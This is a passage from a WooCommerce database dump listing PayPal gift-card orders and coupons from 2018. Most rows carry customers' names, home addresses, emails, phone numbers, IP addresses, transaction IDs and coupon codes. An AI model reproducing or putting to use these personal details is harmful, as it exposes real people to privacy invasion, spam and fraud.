'),(13776,699,'699#238','solymarcouponCHEP8'),(13777,699,'mwb_wgm_order_giftcard','send'),(13778,699,'_order_stock_reduced','yes'),(13779,699,'PayPal Transaction Fee','3.68'),(13780,701,'_order_key','wc_order_5b4f6c676adf0'),(13781,701,'_customer_user','34'),(13782,701,'_payment_method','paypal'),(13783,701,'_payment_method_title','PayPal'),(13784,701,'_transaction_id',''),(13785,701,'_customer_ip_address','2.235.69.213'),(13786,701,'_customer_user_agent','mozilla/5.0 (windows nt 6.1) applewebkit/537.36 (khtml, like gecko) chrome/67.0.3396.99 safari/537.36'),(13787,701,'_created_via','checkout'),(13788,701,'_date_completed',''),(13789,701,'_completed_date',''),(13790,701,'_date_paid',''),(13791,701,'_paid_date',''),(13792,701,'_cart_hash','c895c46c6b03a23295582bf8aa0d3758'),(13793,701,'_billing_first_name','Rossana'),(13794,701,'_billing_last_name','Marconi'),(13795,701,'_billing_company',''),(13796,701,'_billing_address_1','via Cadibona, 9'),(13797,701,'_billing_address_2',''),(13798,701,'_billing_city','Milano'),(13799,701,'_billing_state',''),(13800,701,'_billing_postcode',''),(13801,701,'_billing_country',''),(13802,701,'_billing_email','liquim@libero.it'),(13803,701,'_billing_phone','3401878666'),(13804,701,'_shipping_first_name',''),(13805,701,'_shipping_last_name',''),(13806,701,'_shipping_company',''),(13807,701,'_shipping_address_1',''),(13808,701,'_shipping_address_2',''),(13809,701,'_shipping_city',''),(13810,701,'_shipping_state',''),(13811,701,'_shipping_postcode',''),(13812,701,'_shipping_country',''),(13813,701,'_order_currency','EUR'),(13814,701,'_cart_discount','0'),(13815,701,'_cart_discount_tax','0'),(13816,701,'_order_shipping','0.00'),(13817,701,'_order_shipping_tax','0'),(13818,701,'_order_tax','0'),(13819,701,'_order_total','120.00'),(13820,701,'_order_version','3.4.0'),(13821,701,'_prices_include_tax','no'),(13822,701,'_billing_address_index','Rossana Marconi  via Cadibona, 9  Milano    liquim@libero.it 3401878666'),(13823,701,'_shipping_address_index','        '),(13824,701,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13825,701,'Numero bambini fino a 6 anni','0'),(13826,701,'Numero ragazzi fino a 13 anni','0'),(13827,701,'Files attached','[]'),(13828,702,'_order_key','wc_order_5b4f7263a5e88'),(13829,702,'_customer_user','34'),(13830,702,'_payment_method','paypal'),(13831,702,'_payment_method_title','PayPal'),(13832,702,'_transaction_id',''),(13833,702,'_customer_ip_address','2.235.69.213'),(13834,702,'_customer_user_agent','mozilla/5.0 (windows nt 6.1) applewebkit/537.36 (khtml, like gecko) chrome/67.0.3396.99 safari/537.36'),(13835,702,'_created_via','checkout'),(13836,702,'_date_completed',''),(13837,702,'_completed_date',''),(13838,702,'_date_paid',''),(13839,702,'_paid_date',''),(13840,702,'_cart_hash','dcc6184ac167056a3f5dda70af2d190d'),(13841,702,'_billing_first_name','Rossana'),(13842,702,'_billing_last_name','Marconi'),(13843,702,'_billing_company',''),(13844,702,'_billing_address_1','via Cadibona, 9'),(13845,702,'_billing_address_2',''),(13846,702,'_billing_city','Milano'),(13847,702,'_billing_state',''),(13848,702,'_billing_postcode',''),(13849,702,'_billing_country',''),(13850,702,'_billing_email','liquim@libero.it'),(13851,702,'_billing_phone','3401878666'),(13852,702,'_shipping_first_name',''),(13853,702,'_shipping_last_name',''),(13854,702,'_shipping_company',''),(13855,702,'_shipping_address_1',''),(13856,702,'_shipping_address_2',''),(13857,702,'_shipping_city',''),(13858,702,'_shipping_state',''),(13859,702,'_shipping_postcode',''),(13860,702,'_shipping_country',''),(13861,702,'_order_currency','EUR'),(13862,702,'_cart_discount','0'),(13863,702,'_cart_discount_tax','0'),(13864,702,'_order_shipping','0.00'),(13865,702,'_order_shipping_tax','0'),(13866,702,'_order_tax','0'),(13867,702,'_order_total','120.00'),(13868,702,'_order_version','3.4.0'),(13869,702,'_prices_include_tax','no'),(13870,702,'_billing_address_index','Rossana Marconi  via Cadibona, 9  Milano    liquim@libero.it 3401878666'),(13871,702,'_shipping_address_index','        '),(13872,702,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13873,702,'Numero bambini fino a 6 anni','0'),(13874,702,'Numero ragazzi fino a 13 anni','0'),(13875,702,'Files attached','[]'),(13876,704,'_order_key','wc_order_5b55e3912c177'),(13877,704,'_customer_user','34'),(13878,704,'_payment_method','paypal'),(13879,704,'_payment_method_title','PayPal'),(13880,704,'_transaction_id','9UG96882PK3817904'),(13881,704,'_customer_ip_address','2.235.69.213'),(13882,704,'_customer_user_agent','mozilla/5.0 (windows nt 6.1) applewebkit/537.36 (khtml, like gecko) chrome/67.0.3396.99 safari/537.36'),(13883,704,'_created_via','checkout'),(13884,704,'_date_completed','1532355537'),(13885,704,'_completed_date','2018-07-23 16:18:57'),(13886,704,'_date_paid','1532355533'),(13887,704,'_paid_date','2018-07-23 16:18:53'),(13888,704,'_cart_hash','35c30e5fedaccda0d5f5f06a46eead84'),(13889,704,'_billing_first_name','Rossana'),(13890,704,'_billing_last_name','Marconi'),(13891,704,'_billing_company',''),(13892,704,'_billing_address_1','via Cadibona, 9'),(13893,704,'_billing_address_2',''),(13894,704,'_billing_city','Milano'),(13895,704,'_billing_state',''),(13896,704,'_billing_postcode',''),(13897,704,'_billing_country',''),(13898,704,'_billing_email','liquim@libero.it'),(13899,704,'_billing_phone','3401878666'),(13900,704,'_shipping_first_name',''),(13901,704,'_shipping_last_name',''),(13902,704,'_shipping_company',''),(13903,704,'_shipping_address_1',''),(13904,704,'_shipping_address_2',''),(13905,704,'_shipping_city',''),(13906,704,'_shipping_state',''),(13907,704,'_shipping_postcode',''),(13908,704,'_shipping_country',''),(13909,704,'_order_currency','EUR'),(13910,704,'_cart_discount','0'),(13911,704,'_cart_discount_tax','0'),(13912,704,'_order_shipping','0.00'),(13913,704,'_order_shipping_tax','0'),(13914,704,'_order_tax','0'),(13915,704,'_order_total','120.00'),(13916,704,'_order_version','3.4.3'),(13917,704,'_prices_include_tax','no'),(13918,704,'_billing_address_index','Rossana Marconi  via Cadibona, 9  Milano    liquim@libero.it 3401878666'),(13919,704,'_shipping_address_index','        '),(13920,704,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13921,704,'Numero bambini fino a 6 anni','0'),(13922,704,'Numero ragazzi fino a 13 anni','0'),(13923,704,'Files attached','[]'),(13924,704,'Payment type','instant'),(13925,704,'_paypal_status','completed'),(13926,704,'_download_permissions_granted','yes'),(13927,704,'_recorded_sales','yes'),(13928,704,'_recorded_coupon_usage_counts','yes'),(13929,705,'discount_type','fixed_cart'),(13930,705,'coupon_amount','120'),(13931,705,'individual_use','no'),(13932,705,'usage_limit','1'),(13933,705,'expiry_date','2019-01-19'),(13934,705,'apply_before_tax','no'),(13935,705,'free_shipping','no'),(13936,705,'minimum_amount',''),(13937,705,'maximum_amount',''),(13938,705,'exclude_sale_items','no'),(13939,705,'exclude_product_ids',''),(13940,705,'exclude_product_categories',''),(13941,705,'mwb_wgm_giftcard_coupon','704'),(13942,705,'mwb_wgm_giftcard_coupon_unique','online'),(13943,705,'mwb_wgm_giftcard_coupon_product_id','472'),(13944,705,'mwb_wgm_giftcard_coupon_mail_to','ulissedellavittoria@gmail.com'),(13945,704,'704#241','solymarcoupon6L2RU'),(13946,704,'mwb_wgm_order_giftcard','send'),(13947,704,'_order_stock_reduced','yes'),(13948,704,'PayPal Transaction Fee','4.43'),(13951,704,'_edit_lock','1532375216:1'),(13952,699,'_edit_lock','1532372762:1'),(13953,697,'_edit_lock','1532375389:1'),(13954,707,'_order_key','wc_order_5b59f716462ef'),(13955,707,'_customer_user','0'),(13956,707,'_payment_method','paypal'),(13957,707,'_payment_method_title','PayPal'),(13958,707,'_transaction_id','5FF469116T2337044'),(13959,707,'_customer_ip_address','94.191.150.166'),(13960,707,'_customer_user_agent','mozilla/5.0 (linux; android 8.1.0; clt-l29 build/huaweiclt-l29) applewebkit/537.36 (khtml, like gecko) chrome/67.0.3396.87 mobile safari/537.36'),(13961,707,'_created_via','checkout'),(13962,707,'_date_completed',''),(13963,707,'_completed_date',''),(13964,707,'_date_paid','1532622800'),(13965,707,'_paid_date','2018-07-26 18:33:20'),(13966,707,'_cart_hash','5c93514a5ce29bfca2c73293e12d0b2d'),(13967,707,'_billing_first_name','Gunnar'),(13968,707,'_billing_last_name','Ander'),(13969,707,'_billing_company',''),(13970,707,'_billing_address_1','Vitalisvägen 5'),(13971,707,'_billing_address_2',''),(13972,707,'_billing_city','Stockholm'),(13973,707,'_billing_state',''),(13974,707,'_billing_postcode',''),(13975,707,'_billing_country',''),(13976,707,'_billing_email','gungo80@gmail.com'),(13977,707,'_billing_phone','+46735333193'),(13978,707,'_shipping_first_name',''),(13979,707,'_shipping_last_name',''),(13980,707,'_shipping_company',''),(13981,707,'_shipping_address_1',''),(13982,707,'_shipping_address_2',''),(13983,707,'_shipping_city',''),(13984,707,'_shipping_state',''),(13985,707,'_shipping_postcode',''),(13986,707,'_shipping_country',''),(13987,707,'_order_currency','EUR'),(13988,707,'_cart_discount','0'),(13989,707,'_cart_discount_tax','0'),(13990,707,'_order_shipping','0.00'),(13991,707,'_order_shipping_tax','0'),(13992,707,'_order_tax','0'),(13993,707,'_order_total','120.00'),(13994,707,'_order_version','3.4.3'),(13995,707,'_prices_include_tax','no'),(13996,707,'_billing_address_index','Gunnar Ander  Vitalisvägen 5  Stockholm    gungo80@gmail.com +46735333193'),(13997,707,'_shipping_address_index','        '),(13998,707,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(13999,707,'Numero bambini fino a 6 anni','0'),(14000,707,'Numero ragazzi fino a 13 anni','0'),(14001,707,'Files attached','[]'),(14002,707,'Payment type','instant'),(14003,707,'_paypal_status','completed'),(14004,707,'_download_permissions_granted','yes'),(14005,707,'_recorded_sales','yes'),(14006,707,'_recorded_coupon_usage_counts','yes'),(14007,708,'discount_type','fixed_cart'),(14008,708,'coupon_amount','120'),(14009,708,'individual_use','no'),(14010,708,'usage_limit','1'),(14011,708,'expiry_date','2019-01-22'),(14012,708,'apply_before_tax','no'),(14013,708,'free_shipping','no'),(14014,708,'minimum_amount',''),(14015,708,'maximum_amount',''),(14016,708,'exclude_sale_items','no'),(14017,708,'exclude_product_ids',''),(14018,708,'exclude_product_categories',''),(14019,708,'mwb_wgm_giftcard_coupon','707'),(14020,708,'mwb_wgm_giftcard_coupon_unique','online'),(14021,708,'mwb_wgm_giftcard_coupon_product_id','472'),(14022,708,'mwb_wgm_giftcard_coupon_mail_to','gungo80@gmail.com'),(14023,707,'707#242','a:1:{i:0;s:18:\"solymarcouponFZKJN\";}'),(14024,707,'mwb_wgm_order_giftcard','send'),(14025,707,'_order_stock_reduced','yes'),(14026,707,'PayPal Transaction Fee','4.43'),(14027,709,'_order_key','wc_order_5ba654bb0f1bd'),(14028,709,'_customer_user','0'),(14029,709,'_payment_method','paypal'),(14030,709,'_payment_method_title','PayPal'),(14031,709,'_transaction_id','3P605327EA789325T'),(14032,709,'_customer_ip_address','87.3.65.101'),(14033,709,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/69.0.3497.100 safari/537.36'),(14034,709,'_created_via','checkout'),(14035,709,'_date_completed',''),(14036,709,'_completed_date',''),(14037,709,'_date_paid','1537627456'),(14038,709,'_paid_date','2018-09-22 16:44:16'),(14039,709,'_cart_hash','33c4069e82be4eed3258ed653e058fc2'),(14040,709,'_billing_first_name','Michela'),(14041,709,'_billing_last_name','Chiari'),(14042,709,'_billing_company',''),(14043,709,'_billing_address_1',''),(14044,709,'_billing_address_2',''),(14045,709,'_billing_city',''),(14046,709,'_billing_state',''),(14047,709,'_billing_postcode',''),(14048,709,'_billing_country',''),(14049,709,'_billing_email','chiari.michi@gmail.com'),(14050,709,'_billing_phone','3394980909'),(14051,709,'_shipping_first_name',''),(14052,709,'_shipping_last_name',''),(14053,709,'_shipping_company',''),(14054,709,'_shipping_address_1',''),(14055,709,'_shipping_address_2',''),(14056,709,'_shipping_city',''),(14057,709,'_shipping_state',''),(14058,709,'_shipping_postcode',''),(14059,709,'_shipping_country',''),(14060,709,'_order_currency','EUR'),(14061,709,'_cart_discount','0'),(14062,709,'_cart_discount_tax','0'),(14063,709,'_order_shipping','0.00'),(14064,709,'_order_shipping_tax','0'),(14065,709,'_order_tax','0'),(14066,709,'_order_total','120.00'),(14067,709,'_order_version','3.4.3'),(14068,709,'_prices_include_tax','no'),(14069,709,'_billing_address_index','Michela Chiari        chiari.michi@gmail.com 3394980909'),(14070,709,'_shipping_address_index','        '),(14071,709,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14072,709,'Numero bambini fino a 6 anni','0'),(14073,709,'Numero ragazzi fino a 13 anni','0'),(14074,709,'Files attached','[]'),(14075,709,'Payment type','instant'),(14076,709,'_paypal_status','completed'),(14077,709,'_download_permissions_granted','yes'),(14078,709,'_recorded_sales','yes'),(14079,709,'_recorded_coupon_usage_counts','yes'),(14080,710,'discount_type','fixed_cart'),(14081,710,'coupon_amount','120'),(14082,710,'individual_use','no'),(14083,710,'usage_limit','1'),(14084,710,'expiry_date','2019-03-21'),(14085,710,'apply_before_tax','no'),(14086,710,'free_shipping','no'),(14087,710,'minimum_amount',''),(14088,710,'maximum_amount',''),(14089,710,'exclude_sale_items','no'),(14090,710,'exclude_product_ids',''),(14091,710,'exclude_product_categories',''),(14092,710,'mwb_wgm_giftcard_coupon','709'),(14093,710,'mwb_wgm_giftcard_coupon_unique','online'),(14094,710,'mwb_wgm_giftcard_coupon_product_id','472'),(14095,710,'mwb_wgm_giftcard_coupon_mail_to','Marta'),(14096,709,'709#243','a:1:{i:0;s:18:\"solymarcoupon2HUU1\";}'),(14097,709,'mwb_wgm_order_giftcard','send'),(14098,709,'_order_stock_reduced','yes'),(14099,709,'PayPal Transaction Fee','4.43'),(14100,712,'_edit_lock','1538205782:1'),(14101,712,'_edit_last','1'),(14102,712,'_wp_page_template','default'),(14103,712,'_yoast_wpseo_content_score','60'),(14104,716,'_order_key','wc_order_5c1170fd25b2a'),(14105,716,'_customer_user','0'),(14106,716,'_payment_method','paypal'),(14107,716,'_payment_method_title','PayPal'),(14108,716,'_transaction_id','0UN42589888980707'),(14109,716,'_customer_ip_address','176.206.22.122'),(14110,716,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1'),(14111,716,'_created_via','checkout'),(14112,716,'_date_completed',''),(14113,716,'_completed_date',''),(14114,716,'_date_paid','1544646949'),(14115,716,'_paid_date','2018-12-12 21:35:49'),(14116,716,'_cart_hash','0e2a7dd7ec888aac8ab08c1ce48843d6'),(14117,716,'_billing_first_name','Fabrizio'),(14118,716,'_billing_last_name','Bello'),(14119,716,'_billing_company',''),(14120,716,'_billing_address_1','Via tommaseo 122'),(14121,716,'_billing_address_2',''),(14122,716,'_billing_city','Rimini'),(14123,716,'_billing_state','RN'),(14124,716,'_billing_postcode','47924'),(14125,716,'_billing_country','IT'),(14126,716,'_billing_email','bello.fabrizio@gmail.com'),(14127,716,'_billing_phone','3492682253'),(14128,716,'_shipping_first_name',''),(14129,716,'_shipping_last_name',''),(14130,716,'_shipping_company',''),(14131,716,'_shipping_address_1',''),(14132,716,'_shipping_address_2',''),(14133,716,'_shipping_city',''),(14134,716,'_shipping_state',''),(14135,716,'_shipping_postcode',''),(14136,716,'_shipping_country',''),(14137,716,'_order_currency','EUR'),(14138,716,'_cart_discount','0'),(14139,716,'_cart_discount_tax','0'),(14140,716,'_order_shipping','0'),(14141,716,'_order_shipping_tax','0'),(14142,716,'_order_tax','0'),(14143,716,'_order_total','98.00'),(14144,716,'_order_version','3.5.2'),(14145,716,'_prices_include_tax','no'),(14146,716,'_billing_address_index','Fabrizio Bello  Via tommaseo 122  Rimini RN 47924 IT bello.fabrizio@gmail.com 3492682253'),(14147,716,'_shipping_address_index','        '),(14148,716,'Payment type','instant'),(14149,716,'_paypal_status','completed'),(14150,716,'_download_permissions_granted','yes'),(14151,716,'_recorded_sales','yes'),(14152,716,'_recorded_coupon_usage_counts','yes'),(14153,716,'_order_stock_reduced','yes'),(14154,716,'PayPal Transaction Fee','3.68'),(14155,716,'_edit_lock','1544987310:1'),(14156,716,'_edit_last','1'),(14157,548,'_low_stock_amount',''),(14158,209,'_edit_lock','1544818235:1'),(14159,718,'_order_key','wc_order_5c140fdff2232'),(14160,718,'_customer_user','1'),(14161,718,'_payment_method','paypal'),(14162,718,'_payment_method_title','PayPal'),(14163,718,'_transaction_id','0V408078WS9951214'),(14164,718,'_customer_ip_address','93.44.87.4'),(14165,718,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'),(14166,718,'_created_via','checkout'),(14167,718,'_date_completed',''),(14168,718,'_completed_date',''),(14169,718,'_date_paid','1544818856'),(14170,718,'_paid_date','2018-12-14 21:20:56'),(14171,718,'_cart_hash','456d9d2862758a588ba43c3077b7b4c9'),(14172,718,'_billing_first_name','Franco'),(14173,718,'_billing_last_name','Baldisserri'),(14174,718,'_billing_company',''),(14175,718,'_billing_address_1',''),(14176,718,'_billing_address_2',''),(14177,718,'_billing_city',''),(14178,718,'_billing_state',''),(14179,718,'_billing_postcode',''),(14180,718,'_billing_country',''),(14181,718,'_billing_email','webmaster@baldisserri.com'),(14182,718,'_billing_phone','3286193589'),(14183,718,'_shipping_first_name',''),(14184,718,'_shipping_last_name',''),(14185,718,'_shipping_company',''),(14186,718,'_shipping_address_1',''),(14187,718,'_shipping_address_2',''),(14188,718,'_shipping_city',''),(14189,718,'_shipping_state',''),(14190,718,'_shipping_postcode',''),(14191,718,'_shipping_country',''),(14192,718,'_order_currency','EUR'),(14193,718,'_cart_discount','0'),(14194,718,'_cart_discount_tax','0'),(14195,718,'_order_shipping','0.00'),(14196,718,'_order_shipping_tax','0'),(14197,718,'_order_tax','0'),(14198,718,'_order_total','0.10'),(14199,718,'_order_version','3.5.2'),(14200,718,'_prices_include_tax','no'),(14201,718,'_billing_address_index','Franco Baldisserri        webmaster@baldisserri.com 3286193589'),(14202,718,'_shipping_address_index','        '),(14203,718,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(14204,718,'Numero bambini fino a 6 anni','0'),(14205,718,'Numero ragazzi fino a 13 anni','0'),(14206,718,'Files attached','[]'),(14207,718,'Payment type','instant'),(14208,718,'_paypal_status','completed'),(14209,718,'_download_permissions_granted','yes'),(14210,718,'_recorded_sales','yes'),(14211,718,'_recorded_coupon_usage_counts','yes'),(14212,718,'_order_stock_reduced','yes'),(14213,719,'discount_type','fixed_cart'),(14214,719,'coupon_amount','0.1'),(14215,719,'individual_use','no'),(14216,719,'usage_limit','1'),(14217,719,'expiry_date','2019-06-12'),(14218,719,'apply_before_tax','no'),(14219,719,'free_shipping','yes'),(14220,719,'minimum_amount',''),(14221,719,'maximum_amount',''),(14222,719,'exclude_sale_items','no'),(14223,719,'exclude_product_categories',''),(14224,719,'exclude_product_ids',''),(14225,719,'mwb_wgm_giftcard_coupon','718'),(14226,719,'mwb_wgm_giftcard_coupon_unique','online'),(14227,719,'mwb_wgm_giftcard_coupon_product_id','548'),(14228,719,'mwb_wgm_giftcard_coupon_mail_to','webmaster@baldisserri.com'),(14229,718,'718#245','solymarcouponOQ2IH'),(14230,718,'mwb_wgm_order_giftcard','send'),(14231,718,'PayPal Transaction Fee','0.10'),(14232,718,'_edit_lock','1544818960:1'),(14233,720,'_order_key','wc_order_5c165e9ab493a'),(14234,720,'_customer_user','0'),(14235,720,'_payment_method','paypal'),(14236,720,'_payment_method_title','PayPal'),(14237,720,'_transaction_id','0BR07520W5492501W'),(14238,720,'_customer_ip_address','93.44.86.182'),(14239,720,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),(14240,720,'_created_via','checkout'),(14241,720,'_date_completed','1544970488'),(14242,720,'_completed_date','2018-12-16 15:28:08'),(14243,720,'_date_paid','1544970051'),(14244,720,'_paid_date','2018-12-16 15:20:51'),(14245,720,'_cart_hash','8978db2a6c08631d7a0e7d565af7a5fa'),(14246,720,'_billing_first_name','simone'),(14247,720,'_billing_last_name','pallotti'),(14248,720,'_billing_company',''),(14249,720,'_billing_address_1',''),(14250,720,'_billing_address_2',''),(14251,720,'_billing_city',''),(14252,720,'_billing_state',''),(14253,720,'_billing_postcode',''),(14254,720,'_billing_country',''),(14255,720,'_billing_email','spallotti68@gmail.com'),(14256,720,'_billing_phone','3384131807'),(14257,720,'_shipping_first_name',''),(14258,720,'_shipping_last_name',''),(14259,720,'_shipping_company',''),(14260,720,'_shipping_address_1',''),(14261,720,'_shipping_address_2',''),(14262,720,'_shipping_city',''),(14263,720,'_shipping_state',''),(14264,720,'_shipping_postcode',''),(14265,720,'_shipping_country',''),(14266,720,'_order_currency','EUR'),(14267,720,'_cart_discount','0'),(14268,720,'_cart_discount_tax','0'),(14269,720,'_order_shipping','0.00'),(14270,720,'_order_shipping_tax','0'),(14271,720,'_order_tax','0'),(14272,720,'_order_total','90.00'),(14273,720,'_order_version','3.5.2'),(14274,720,'_prices_include_tax','no'),(14275,720,'_billing_address_index','simone pallotti        spallotti68@gmail.com 3384131807'),(14276,720,'_shipping_address_index','        '),(14277,720,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14278,720,'Numero bambini fino a 6 anni','0'),(14279,720,'Numero ragazzi fino a 13 anni','0'),(14280,720,'Files attached','[]'),(14281,720,'Payment type','instant'),(14282,720,'_paypal_status','completed'),(14283,720,'_download_permissions_granted','yes'),(14284,720,'_recorded_sales','yes'),(14285,720,'_recorded_coupon_usage_counts','yes'),(14286,720,'_order_stock_reduced','yes'),(14287,721,'discount_type','fixed_cart'),(14288,721,'coupon_amount','90'),(14289,721,'individual_use','no'),(14290,721,'usage_limit','1'),(14291,721,'expiry_date','2019-06-14'),(14292,721,'apply_before_tax','no'),(14293,721,'free_shipping','yes'),(14294,721,'minimum_amount',''),(14295,721,'maximum_amount',''),(14296,721,'exclude_sale_items','no'),(14297,721,'exclude_product_categories',''),(14298,721,'exclude_product_ids',''),(14299,721,'mwb_wgm_giftcard_coupon','720'),(14300,721,'mwb_wgm_giftcard_coupon_unique','online'),(14301,721,'mwb_wgm_giftcard_coupon_product_id','474'),(14302,721,'mwb_wgm_giftcard_coupon_mail_to','Franco e Simonetta'),(14303,720,'720#246','solymarcouponONKIF'),(14304,720,'mwb_wgm_order_giftcard','send'),(14305,720,'PayPal Transaction Fee','3.41'),(14306,722,'_order_key','wc_order_5c24aa3fa1b7a'),(14307,722,'_customer_user','35'),(14308,722,'_payment_method','paypal'),(14309,722,'_payment_method_title','PayPal'),(14310,722,'_transaction_id','0YS80009YT355963L'),(14311,722,'_customer_ip_address','5.88.176.155'),(14312,722,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'),(14313,722,'_created_via','checkout'),(14314,722,'_date_completed',''),(14315,722,'_completed_date',''),(14316,722,'_date_paid','1545906851'),(14317,722,'_paid_date','2018-12-27 11:34:11'),(14318,722,'_cart_hash','d0c302460525c8c4a3546e3772e45342'),(14319,722,'_billing_first_name','Lorenzo'),(14320,722,'_billing_last_name','prandini'),(14321,722,'_billing_company',''),(14322,722,'_billing_address_1','Via N.Sauro 21'),(14323,722,'_billing_address_2',''),(14324,722,'_billing_city','Modena'),(14325,722,'_billing_state',''),(14326,722,'_billing_postcode',''),(14327,722,'_billing_country',''),(14328,722,'_billing_email','lorenzo.prandini@virgilio.it'),(14329,722,'_billing_phone','3386896613'),(14330,722,'_shipping_first_name',''),(14331,722,'_shipping_last_name',''),(14332,722,'_shipping_company',''),(14333,722,'_shipping_address_1',''),(14334,722,'_shipping_address_2',''),(14335,722,'_shipping_city',''),(14336,722,'_shipping_state',''),(14337,722,'_shipping_postcode',''),(14338,722,'_shipping_country',''),(14339,722,'_order_currency','EUR'),(14340,722,'_cart_discount','0'),(14341,722,'_cart_discount_tax','0'),(14342,722,'_order_shipping','0.00'),(14343,722,'_order_shipping_tax','0'),(14344,722,'_order_tax','0'),(14345,722,'_order_total','150.00'),(14346,722,'_order_version','3.5.2'),(14347,722,'_prices_include_tax','no'),(14348,722,'_billing_address_index','Lorenzo prandini  Via N.Sauro 21  Modena    lorenzo.prandini@virgilio.it 3386896613'),(14349,722,'_shipping_address_index','        '),(14350,722,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14351,722,'Numero bambini fino a 6 anni','1'),(14352,722,'Numero ragazzi fino a 13 anni','0'),(14353,722,'Files attached','[]'),(14354,722,'Payment type','instant'),(14355,722,'_paypal_status','completed'),(14356,722,'_download_permissions_granted','yes'),(14357,722,'_recorded_sales','yes'),(14358,722,'_recorded_coupon_usage_counts','yes'),(14359,722,'_order_stock_reduced','yes'),(14360,723,'discount_type','fixed_cart'),(14361,723,'coupon_amount','150'),(14362,723,'individual_use','no'),(14363,723,'usage_limit','1'),(14364,723,'expiry_date','2019-06-25'),(14365,723,'apply_before_tax','no'),(14366,723,'free_shipping','yes'),(14367,723,'minimum_amount',''),(14368,723,'maximum_amount',''),(14369,723,'exclude_sale_items','no'),(14370,723,'exclude_product_categories',''),(14371,723,'exclude_product_ids',''),(14372,723,'mwb_wgm_giftcard_coupon','722'),(14373,723,'mwb_wgm_giftcard_coupon_unique','online'),(14374,723,'mwb_wgm_giftcard_coupon_product_id','548'),(14375,723,'mwb_wgm_giftcard_coupon_mail_to','lorenzo.prandini@virgilio.it'),(14376,722,'722#247','solymarcoupon2FZIE'),(14377,722,'mwb_wgm_order_giftcard','send'),(14378,722,'PayPal Transaction Fee','5.45'),(14379,724,'_order_key','wc_order_5c24abd712bc2'),(14380,724,'_customer_user','35'),(14381,724,'_payment_method','paypal'),(14382,724,'_payment_method_title','PayPal'),(14383,724,'_transaction_id','1B027078C1884060L'),(14384,724,'_customer_ip_address','5.88.176.155'),(14385,724,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'),(14386,724,'_created_via','checkout'),(14387,724,'_date_completed',''),(14388,724,'_completed_date',''),(14389,724,'_date_paid','1545907255'),(14390,724,'_paid_date','2018-12-27 11:40:55'),(14391,724,'_cart_hash','76faad101eaddbb4098b178d9f46df17'),(14392,724,'_billing_first_name','Lorenzo'),(14393,724,'_billing_last_name','Prandini'),(14394,724,'_billing_company',''),(14395,724,'_billing_address_1','Via N.Sauro 21'),(14396,724,'_billing_address_2',''),(14397,724,'_billing_city','Modena'),(14398,724,'_billing_state',''),(14399,724,'_billing_postcode',''),(14400,724,'_billing_country',''),(14401,724,'_billing_email','lorenzo.prandini@virgilio.it'),(14402,724,'_billing_phone','3386896613'),(14403,724,'_shipping_first_name',''),(14404,724,'_shipping_last_name',''),(14405,724,'_shipping_company',''),(14406,724,'_shipping_address_1',''),(14407,724,'_shipping_address_2',''),(14408,724,'_shipping_city',''),(14409,724,'_shipping_state',''),(14410,724,'_shipping_postcode',''),(14411,724,'_shipping_country',''),(14412,724,'_order_currency','EUR'),(14413,724,'_cart_discount','0'),(14414,724,'_cart_discount_tax','0'),(14415,724,'_order_shipping','0.00'),(14416,724,'_order_shipping_tax','0'),(14417,724,'_order_tax','0'),(14418,724,'_order_total','100.00'),(14419,724,'_order_version','3.5.2'),(14420,724,'_prices_include_tax','no'),(14421,724,'_billing_address_index','Lorenzo Prandini  Via N.Sauro 21  Modena    lorenzo.prandini@virgilio.it 3386896613'),(14422,724,'_shipping_address_index','        '),(14423,724,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(14424,724,'Numero bambini fino a 6 anni','0'),(14425,724,'Numero ragazzi fino a 13 anni','0'),(14426,724,'Files attached','[]'),(14427,724,'Payment type','instant'),(14428,724,'_paypal_status','completed'),(14429,724,'_download_permissions_granted','yes'),(14430,724,'_recorded_sales','yes'),(14431,724,'_recorded_coupon_usage_counts','yes'),(14432,724,'_order_stock_reduced','yes'),(14433,725,'discount_type','fixed_cart'),(14434,725,'coupon_amount','100'),(14435,725,'individual_use','no'),(14436,725,'usage_limit','1'),(14437,725,'expiry_date','2019-06-25'),(14438,725,'apply_before_tax','no'),(14439,725,'free_shipping','yes'),(14440,725,'minimum_amount',''),(14441,725,'maximum_amount',''),(14442,725,'exclude_sale_items','no'),(14443,725,'exclude_product_categories',''),(14444,725,'exclude_product_ids',''),(14445,725,'mwb_wgm_giftcard_coupon','724'),(14446,725,'mwb_wgm_giftcard_coupon_unique','online'),(14447,725,'mwb_wgm_giftcard_coupon_product_id','548'),(14448,725,'mwb_wgm_giftcard_coupon_mail_to','lorenzo.prandini@virgilio.it'),(14449,724,'724#248','solymarcoupon6KMQS'),(14450,724,'mwb_wgm_order_giftcard','send'),(14451,724,'PayPal Transaction 